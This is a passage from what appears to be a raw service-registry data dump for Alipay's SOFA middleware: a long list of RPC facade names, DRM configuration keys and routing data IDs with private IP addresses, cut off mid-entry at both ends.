E_ID#@#SOFA","com.alipay.fincoretechdss.core.service.xflushAlarm.XflushAlarmDrmInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.transfer.RuleTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.140.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pushcore.facade.PushDeviceReadCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ConsultantDRM.useCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.alphasec.compass.operating.facade.service.OperatingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.backend.service.facade.happiness.HappinessServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IZoneRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findecision:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdspcore.common.service.facade.callback.DispositionCallback:1.0:finriskmngcore_dispositionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcDrillManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.145.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.26.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:FundClassifyActivate_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.63.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.cdp.common.service.facade.space.query.SpaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.aciamcore:name=cn.com.antcloud.common.auth.client.config.AntPersonalDrmConfigTrigger.disableFromTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.MetaProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.bp.engine.extension.BPSubProcessPUIDHandler:1.0:ideploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.login.UserLoginServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.trade.TradeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.mrchpunish.MrchPunishServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.apiAccess.ApiAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileanti.common.service.mvcfacade.service.GrayPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.keyEventNoticeTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.31.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.settlement.common.service.facade.api.HoldQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.commandcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.fpc.rpc.FootprintRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.ordersetting.api.BatchOrderSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmapi.client.SystemExterfaceInvokeService:1.0:isecuritycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-promosite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.InvolvedPartyRoleViewQueryFacade:1.0:involvedPartyRoleViewQueryFacade-antgroup@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardCardInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.MerchantStoreActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.readAllFromParamCenter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.client.MobilerelationTbaseClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xts.dtap.service.LogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductQueryFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.log.LoggerGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.biz.drill.DrillTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.changeLocation.ChangeLocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.CrowdServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.pamir.ajax.PamAjaxServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.PdSignRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:unifygw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.BizConfigAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.bdfeedback.BdFeedBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.dm.common.service.facade.api.ComputationalLogicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.UsageCardEventDrmResource.usageCompensateOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmAppScriptorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.32.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hyp.common.service.facade.cfgriskctrl.AppConfigParserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.instcontract.InstContractMigrateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:alipassprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:mappprodspecialcheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.AmlDataPunishService:1.0:amlPunishServiceNormal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bkpromofront.facade.config.api.PromoConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","darwin@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_SETTLEMANAGER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.airbops_one_oss_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbopenprod.common.service.facade.delivery.DeliveryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityOperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.inspect.InspectTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientStabilityVersionsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.PublishService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.inner.api.AccountReserveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DEV_PROJECT_GROUP_INFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promobatch.spi.adapter.facade.CallbackSpiFacade:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.account.AssetBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.installment.service.PcreditInstallmentOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityDataToolsDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.WordCategoryMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.aliedit.AlieditSecurityKeyService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rule.api.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.usercenter.common.service.facade.project.TenantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilityprod.common.service.facade.appeal.AppealConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:grscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_SDCHECKER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:TENANT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.MsgSendLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.severless.facade.spi.SpiBenefitSendFacade:1.0:fundapplicationnyo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IDPATROL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradefront.service.cooperate.api.AccorderCooperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.repay.CurrentRepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.tac.TacMiniappCertInspFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.brand.BrandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:buservice_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.AccountSummaryFacde:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.StandardCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aldata.common.service.facade.api.SpvInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.common.service.integration.common.cryptprod.CryptprodClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:security_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:icontrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.common.AutoIspAttachmentFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linkede.fabricproxy.common.service.facade.FabricproxyServiceGrayPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.CustomerAccountSwitchDrm.accountClearSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alidevice.biz.devicemanager.iotpaysdk.service.CtuPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuprodFlowGuideFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finquotationcenter.common.service.facade.api.SnapshotStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.appcenter.MobileAppRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.common.config.api.CategoryDictionariesQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ifaatam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.LaunchAdminFacade:1.0:contentfusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:yebplus_WorkOrderService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtask.common.service.facade.RigelTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.TaskTestNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.184.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.FacadeCacheConfigDRM.clientFacadeCacheConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.trade.EtcTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfund.facade.api.InstFundInstructionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.227.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.arks:name=com.alipay.arks.drm.DRMLoadBalanceResource.updateAntvipIntervalMsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.amlmatrix.biz.shared.common.interfaces.StrCaseForMngManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm7015#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_C_MOBILEAPPSETCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pvsofaserver.facade.PvSofaService:1.0:elastic_origin_zone@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbomp.common.service.facade.rutao.KbAlscModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.failover.FailoverSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimprod.common.service.InsClaimManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.bag.facade.BagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:definfinance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_C_CTUSTOCK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tmwc.service.cq.CqRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.PlanRefServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.HuabeiFreechargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.collectcore:name=com.shangshu.collectcore.core.filter.control.DedupFilterSwitch.filterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.login.MfaConfigServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.icontrol.biz.service.impl.rpc.AppointGroupHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.BizConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.247.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fppolicy.service.configtable.ConfigTableDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.parseOldContractAsMContractOwnerIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:openpunish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.core.service.hbase.promo.pullnew.PullNewUserFeatureRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.PolicyDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isProtocolSupplement,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.edeductcenter.common.service.facade.CreateEbppBillCallBack:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.arc.job.processor.core.service.mng.TenantManagement:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.165.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finecorisk.common.facade.service.api.query.YebsTransferOutfluxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cashier@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECURITYCDS#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifemsgprodTemplateProcess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.api.SecurityValidatePolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.FlowScaleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.cashflow.FxCashFlowDetailAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LINKW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.asset.service.AssetProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.territory.service.TerritoryRuleDisplayCallback:1.0:salesTaskFlowQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.LisaProductManagerInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:hyp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.MerchantReceiveARService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.custcenterprod.facade.AcquireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.144.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.biz.service.strategy.facade.ContentDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.FundUnicomAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.TaskUserCertifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_FEE_ITEM_CROSS_INST_CLEARING_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.spi.bc.BcBusinessInfoFacade:1.0:minicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstrategycenter.common.service.facade.InspectionAuditTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.offlineSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hbtestplatform.facade.service.componentManage.ComponentManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:fundapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.HistoryDateConfigCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.giftinsSpNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.236.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.mng.PreEnvSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.ApiAuthConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.issue.template.seller.accept@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.UserAccountArQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservicesinspect.biz.shared.feature.ExecutionDetectAdaptor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.fcprocess.AntprocessFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.gloancore.common.service.facade.bill.api.LcTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:autoinsprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.NetworkDeviceRuleUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.common.service.facade.api.FaceRecognizeSynchroService:1.0.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.ability.RopAnalyzePropertyFacade:1.0:miniProgramSpecialLicenseImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AllocateInstructionApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.ForestWeatherCityService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArrangementDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.UserLoanRealIncom